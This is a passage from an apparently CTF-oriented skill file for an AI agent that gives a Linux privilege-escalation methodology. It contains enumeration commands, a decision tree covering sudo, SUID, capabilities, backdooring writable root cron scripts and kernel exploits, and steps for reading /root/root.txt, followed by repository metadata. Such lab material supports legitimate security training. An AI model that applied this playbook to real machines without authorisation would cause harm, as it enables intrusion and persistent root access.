files\nfind / -name \"*.bak\" -o -name \"*.backup\" 2>/dev/null","type":"text"}]},{"type":"heading","attrs":{"level":2},"content":[{"text":"Output Format","type":"text"}]},{"type":"paragraph","content":[{"text":"After successful privilege escalation:","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"json"},"content":[{"text":"{\n \"status\": \"root_access_gained\",\n \"method\": \"Sudo vim exploitation via GTFOBins\",\n \"vector\": \"sudo -l showed vim with NOPASSWD\",\n \"root_flag\": \"f6e5d4c3b2a1098765432109876543210\",\n \"exploitation_time\": \"2 minutes\",\n \"mission_complete\": true\n}","type":"text"}]},{"type":"heading","attrs":{"level":2},"content":[{"text":"Success Criteria","type":"text"}]},{"type":"paragraph","content":[{"text":"Mission complete when:","type":"text"}]},{"type":"ordered_list","attrs":{"order":1,"listStyle":"number"},"content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"✅ Root access obtained (uid=0)","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"✅ Root flag located and read","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"✅ Flag is 32-character hexadecimal string","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"✅ Both user and root flags captured","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"✅ State file updated with both flags","type":"text"}]}]}]},{"type":"heading","attrs":{"level":2},"content":[{"text":"Decision Tree","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":""},"content":[{"text":"Initial Access Gained\n│\n├─ Run: sudo -l\n│ ├─ Can sudo something? → GTFOBins → Root\n│ └─ No sudo → Continue\n│\n├─ Find SUID binaries\n│ ├─ Found unusual SUID? → GTFOBins → Root\n│ └─ No exploitable SUID → Continue\n│\n├─ Check capabilities\n│ ├─ cap_setuid on python/perl? → Exploit → Root\n│ └─ No caps → Continue\n│\n├─ Check cron jobs\n│ ├─ Writable script run as root? → Backdoor → Wait → Root\n│ └─ No cron → Continue\n│\n├─ Run linpeas\n│ └─ Follow red/yellow findings\n│\n└─ Kernel exploit (last resort)\n └─ Search and compile exploit","type":"text"}]},{"type":"heading","attrs":{"level":2},"content":[{"text":"Key Principles","type":"text"}]},{"type":"ordered_list","attrs":{"order":1,"listStyle":"number"},"content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Systematic approach","type":"text","marks":[{"type":"strong"}]},{"text":" - Don't skip steps, check everything","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Quick wins first","type":"text","marks":[{"type":"strong"}]},{"text":" - sudo before kernel exploits","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"GTFOBins is your friend","type":"text","marks":[{"type":"strong"}]},{"text":" - Use it for SUID/sudo","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Verify before claiming","type":"text","marks":[{"type":"strong"}]},{"text":" - Ensure you have actual root","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Capture the flag","type":"text","marks":[{"type":"strong"}]},{"text":" - Read root.txt content, not just location","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Non-interactive aware","type":"text","marks":[{"type":"strong"}]},{"text":" - Some exploits need TTY, adapt accordingly","type":"text"}]}]}]},{"type":"heading","attrs":{"level":2},"content":[{"text":"Remember","type":"text"}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Most playground machines have obvious privesc vectors","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Sudo misconfigurations are most common","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"SUID binaries are second most common","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Kernel exploits are rarely needed in playgrounds","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"The root flag MUST be read - don't declare success without it","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Document successful method for learning and future reference","type":"text"}]}]}]},{"type":"heading","attrs":{"level":2},"content":[{"text":"Mission Complete","type":"text"}]},{"type":"paragraph","content":[{"text":"When you can execute:","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# whoami\nroot\n# cat /root/root.txt\na1b2c3d4e5f6789... (32-char hex)","type":"text"}]},{"type":"heading","attrs":{"level":2},"content":[{"text":"Mission accomplished! Update coordinator with both flags.","type":"text"}]}]},"metadata":{"date":"2026-06-05","name":"privilege-escalation-knowledge","author":"@skillopedia","source":{"stars":336,"repo_name":"marketplace","origin_url":"https://github.com/aiskillstore/marketplace/blob/HEAD/skills/charleskozel/privilege-escalation-knowledge/SKILL.md","repo_owner":"aiskillstore","body_sha256":"16c8115e3807fc4c2b33b3d907809f8f99b14e21a75d112c3fc022cd9fbd191e","cluster_key":"0f02061e8cffc9d67f63f754aa12c69b234ca83d8e492ac99e46f03d0d4e15b9","clean_bundle":{"format":"clean-skill-bundle-v1","source":"aiskillstore/marketplace/skills/charleskozel/privilege-escalation-knowledge/SKILL.md","attachments":[{"id":"8d422fed-2642-5f8f-a265-d1281cdf2366","key":"uploads/10433ee7-ad12-4ae0-b34e-97553e46c6c8/8d422fed-2642-5f8f-a265-d1281cdf2366/attachment.json","path":"skill-report.json","size":8399,"sha256":"fedda8e20fff5de14a2d3905bc6266691960a6ca7b39add9807eb6c8033ce5ff","contentType":"application/json; charset=utf-8"}],"bundle_sha256":"3304dcfc465b408e232020329b29ac4007e3b1c23a98aac752d902e4eea910cc","attachment_count":1,"text_attachments":1,"attachment_storage":"skillopedia-attachments-v1","binary_attachments":0,"excluded_attachments":[]},"cluster_size":1,"skill_md_path":"skills/charleskozel/privilege-escalation-knowledge/SKILL.md","import_metadata":{"date":"2026-06-05","author":"@skillopedia","version":"v1","category":"security","category_label":"Security"},"exact_dupes_collapsed_into_this":0},"version":"v1","category":"security","import_tag":"clean-skills-v1","description":"Comprehensive knowledge about Linux privilege escalation. Provides methodologies for enumerating and exploiting privesc vectors including SUID binaries, sudo permissions, capabilities, kernel exploits, cron jobs, and common misconfigurations. Includes systematic approach to capturing root flags."}},"renderedAt":1782979946041}

Privilege Escalation Knowledge Base Purpose This knowledge base provides comprehensive privilege escalation methodologies for Linux systems. It covers escalating from low-privilege users (www-data, user) to root, then capturing the root flag. Layered Privilege Escalation Strategy Core Principle: Escalate systematically through 3 layers - from quick wins to exhaustive enumeration. Layer Framework: Escalation Triggers: - Layer 1 finds nothing obvious → Run Layer 2 enumeration - Layer 2 finds vectors but exploitation fails → Try Layer 3 alternatives - Layer 3 fails → Re-examine reconnaissance, m…